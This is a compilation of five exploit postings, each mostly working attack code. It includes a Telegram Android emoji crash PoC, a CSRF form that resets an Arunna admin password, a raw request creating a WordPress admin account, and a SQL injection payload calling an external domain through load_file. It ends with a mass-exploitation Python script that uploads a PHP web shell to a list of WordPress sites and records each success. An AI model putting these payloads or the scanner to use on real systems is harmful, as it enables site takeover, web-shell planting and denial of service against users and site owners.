<pre><code>Document Title:<br />===============<br />Telegram Android v8.4.4 - Denial of Service (PoC)<br /><br /><br />References (Source):<br />====================<br />https://twitter.com/h4shur<br /><br /><br />Release Date:<br />=============<br />2022-01-30<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />7.8<br /><br /><br />Product & Service Introduction:<br />===============================<br />Telegram is a freeware, cross-platform, cloud-based instant messaging (IM)<br />service. The service also provides end-to-end encrypted video calling,<br />VoIP, file sharing and several other features. It was launched for iOS on<br />14 August 2013 and Android in October 2013. The servers of Telegram are<br />distributed worldwide to decrease frequent data load with five data centers<br />in different regions, while the operational center is based in Dubai in the<br />United Arab Emirates. Various client apps are available for desktop and<br />mobile platforms including official apps for Android, iOS, Windows, macOS<br />and Linux (although registration requires an iOS or Android device and a<br />working phone number). There are also two official Telegram web twin apps –<br />WebK and WebZ – and numerous unofficial clients that make use of Telegram's<br />protocol. All of Telegram's official components are open source, with the<br />exception of the server which is closed-sourced and proprietary.<br /><br />Telegram provides end-to-end encrypted voice and video calls and optional<br />end-to-end encrypted "secret" chats. Cloud chats and groups are encrypted<br />between the app and the server, so that ISPs and other third-parties on the<br />network can't access data, but the Telegram server can. Users can send text<br />and voice messages, make voice and video calls, and share an unlimited<br />number of images, documents (2 GB per file), user locations, animated<br />stickers, contacts, and audio files. In January 2021, Telegram surpassed<br />500 million monthly active users. It was the most downloaded app worldwide<br />in January 2021 with 1 billion downloads globally as of late August 2021.<br /><br /><br />Abstract Advisory Information:<br />==============================<br />An independent vulnerability researcher discovered Android application<br />vulnerabilities in the Telegram application.<br /><br /><br />Affected Product(s):<br />====================<br />Vendor: telegram.org / telegram.me / t.me<br />Product: Android Telegram application (Android-Application)<br />https://telegram.org/android<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-01-30: Researcher Notification & Coordination (Security Researcher)<br />2022-01-30: Public Disclosure<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />local<br /><br /><br />Severity Level:<br />===============<br />medium<br /><br /><br />Disclosure Type:<br />================<br />Full Disclosure<br /><br /><br />Technical specifications and description:<br />================================<br />1.1<br />In version 8.4.4 of Android Telegram application, a denial of service<br />vulnerability was discovered by H4shur. Vulnerability is in the emojis of<br />these messenger.<br /><br />1.2<br />If you send a number of flag emojis with any text on the chat page,<br />clicking on that message will stop the program altogether and avoid<br />providing services.<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />1.1<br />A Denial of Service (DOS) attack is a type of cyberattack in which a<br />malicious person performs an attack with the aim of removing the resources<br />of a system from the reach of its users.<br />It is natural that if this attack is successful, the result will be a<br />slowdown or disabling of the equipment and resources available to the<br />victim.<br />For security demonstration or to reproduce the persistent cross site web<br />vulnerability follow the provided information and steps below to continue.<br /><br /><br />PoC: Exploitation<br />1.1<br />Run the python script, it will create a new file "outputbufferh4shur.txt".<br />1.2<br />Run Telegram Android and go to "Saved Messages" or any Chat page.<br />1.3<br />Copy the content of the file "outputbufferh4shur.txt".<br />1.4<br />Paste the content of outputbufferh4shur.txt into the "Write a message..."<br />and then type any text to this message.<br />1.5<br />Ops...<br />Telegram Crashed <3<br /><br /><br />script:<br />bufferh4shur = "🇮🇷" * 114<br />try:<br /> f=open("outputbufferh4shur.txt","w")<br /> print("[!] Creating %s bytes DOS payload...." %len(bufferh4shur))<br /> f.write(bufferh4shur)<br /> f.close()<br /> print("[!] File Created!")<br />except:<br /> print("File cannot be created!")<br /><br /><br /><br />Security Risk:<br />==============<br />1.1<br />A Denial of Service (DOS) attack is a type of cyberattack in which a<br />malicious person performs an attack with the aim of removing the resources<br />of a system from the reach of its users.<br />It is natural that if this attack is successful, the result will be a<br />slowdown or disabling of the equipment and resources available to the<br />victim.<br /><br /><br />Credits & Authors:<br />==================<br />h4shur<br />Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @h4shur<br />h4shursec@gmail.com<br /></code></pre>
<pre><code># Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)<br /># Date: November 29, 2021<br /># Exploit Author: =(L_L)=<br /># Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/<br /># Vendor Homepage: https://github.com/arunna<br /># Software Link: https://github.com/arunna/arunna<br /># Version: 1.0.0<br /># Tested on: Ubuntu 20.04.2 LTS<br /><br /><!--<br />The attacker can use the CSRF PoC below to change any sensitive user data (password, email, name and so on). <br />--><br /><br /><html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"><table><tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr><tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr><br /><tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr><br /><tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr><br /><tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr><br /><tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr><br /><tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr><br /><tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr><br /><tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr><br /><tr><td>birthmonth[0]</td><td><input type="text" value="3" name="birthmonth[0]"></td></tr><br /><tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr><br /><tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr><br /><tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr><br /><tr><td>tags[0]</td><td><input type="text" value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr><br /><tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr><br /><tr><td>email[0]</td><td><input type="text" value="request@arunna.com" name="email[0]"></td></tr><br /><tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr><br /><tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr><br /><tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr><br /><tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr><br /><tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr><br /><tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr><br /></table><input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"></form></html><br /><br /></code></pre>
<pre><code># Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation<br /># Date: 16.02.2022<br /># Author: Numan Türle<br /># CVE: CVE-2022-0441<br /># Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/<br /># Version: <2.7.6<br /># https://www.youtube.com/watch?v=SI_O6CHXMZk<br /># https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6<br /># https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed<br /><br /><br />POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1<br />Connection: close<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4<br />Content-Type: application/json<br />Content-Length: 339<br /><br />{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}<br /> <br /><br /></code></pre>
<pre><code>## Title: Child's Day Care Management System 1.0 SQL - Injection<br />## Author: nu11secur1ty<br />## Date: 12.16.2021<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15085/childs-day-care-management-system-phpoop-free-source-code.html<br /><br /><br />## Description:<br />The `username` in Login.php app, parameter from Child's Day Care<br />Management System 1.0 appears to be vulnerable to SQL injection<br />attacks.<br />The payload '+(select<br />load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+'<br />was submitted in the username parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed. Also, this system is vulnerable to<br />SQL-Injection-Bypass-Authentication<br />and XSS-Stored attacks. The attacker can be receiving all information<br />from the system by using these vulnerabilities! Status: CRITICAL<br /><br />[+] Payload:<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=zCAMOHlX'+(select<br />load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+''<br />AND (SELECT 1400 FROM (SELECT(SLEEP(5)))NgMD) AND<br />'wBYn'='wBYn&password=a6O!j4g!Z5<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Child's-Day-Care-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/tvbuoi)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated)<br /># Google Dork: inurl:wp-content/plugins/dzs-zoomsounds<br /># Date: 16/02/2022<br /># Exploit Author: Overthinker1877 (1877 Team)<br /># Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/<br /># Version: 6.60<br /># Tested on: Windows / Linux<br /><br />import os<br />import requests<br />import threading<br />from multiprocessing.dummy import Pool,Lock<br />from bs4 import BeautifulSoup<br />import time<br />import smtplib,sys,ctypes<br />from random import choice<br />from colorama import Fore<br />from colorama import Style<br />from colorama import init<br />import re<br />import time<br />from time import sleep<br />init(autoreset=True)<br />fr = Fore.RED<br />gr = Fore.BLUE<br />fc = Fore.CYAN<br />fw = Fore.WHITE<br />fy = Fore.YELLOW<br />fg = Fore.GREEN<br />sd = Style.DIM<br />sn = Style.NORMAL<br />sb = Style.BRIGHT<br />Bad = 0<br />Good = 0<br />def Folder(directory):<br /> if not os.path.exists(directory):<br /> os.makedirs(directory)<br />Folder("exploited")<br />def clear():<br /> try:<br /> if os.name == 'nt':<br /> os.system('cls')<br /> else:<br /> os.system('clear')<br /> except:<br /> pass<br />def finder(i) :<br /> global Bad,Good<br /> head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'}<br /> try :<br /> x = requests.session()<br /> listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php']<br /> for script in listaa :<br /> url = (i+"/"+script)<br /> while True :<br /> req_first = x.get(url, headers=head)<br /> if "error:http raw post data does not exist" in req_first.text :<br /> burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"}<br /> burp0_data = "<?php\r\nerror_reporting(0);\r\necho(base64_decode(\"T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=\"));\r\n@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);\r\necho(\"<a href=\".$_FILES['f']['name'].\">\".$_FILES['f']['name'].\"</a>\");\r\n?>"<br /> requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45)<br /> urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php")<br /> req_second = x.get(urlx, headers=head)<br /> if "Overthinker1877" in req_second.text :<br /> Good = Good + 1<br /> print(fg+"Exploited "+fw+">> "+fg+" = "+urlx)<br /> with open("exploited/shell.txt","a") as file :<br /> file.write(urlx+"\n")<br /> file.close()<br /> else :<br /> Bad = Bad + 1<br /> print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit")<br /> else :<br /> Bad = Bad + 1<br /> print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln")<br /><br /> pass<br /> break<br /> except :<br /> pass<br /> if os.name == 'nt':<br /> ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad))<br /> else :<br /> sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad))<br /><br />def key_logo():<br /> clear = '\x1b[0m'<br /> colors = [36, 32, 34, 35, 31, 37]<br /> x = ' [ + ] OVERTHINKER1877 EXPLOIT'<br /> for N, line in enumerate(x.split('\n')):<br /> sys.stdout.write('\x1b[1;%dm%s%s\n' % (choice(colors), line, clear))<br /> time.sleep(0.05)<br /><br />def process(line):<br /> time.sleep(1)<br /><br /><br />def run() :<br /> key_logo()<br /> clear()<br /> print(""" <br /> [-] -----------------------------------------[-]<br /> [+] WwW.1877.TeaM<br /> [-] -----------------------------------------[-]<br /> \n \n""")<br /> file_name = input("Website List : ")<br /> op = open(file_name,'r').read().splitlines()<br /> TEXTList = [list.strip() for list in op]<br /> p = Pool(int(input('Thread : ')))<br /> p.map(finder, TEXTList)<br /><br />run()<br /> <br /><br /></code></pre>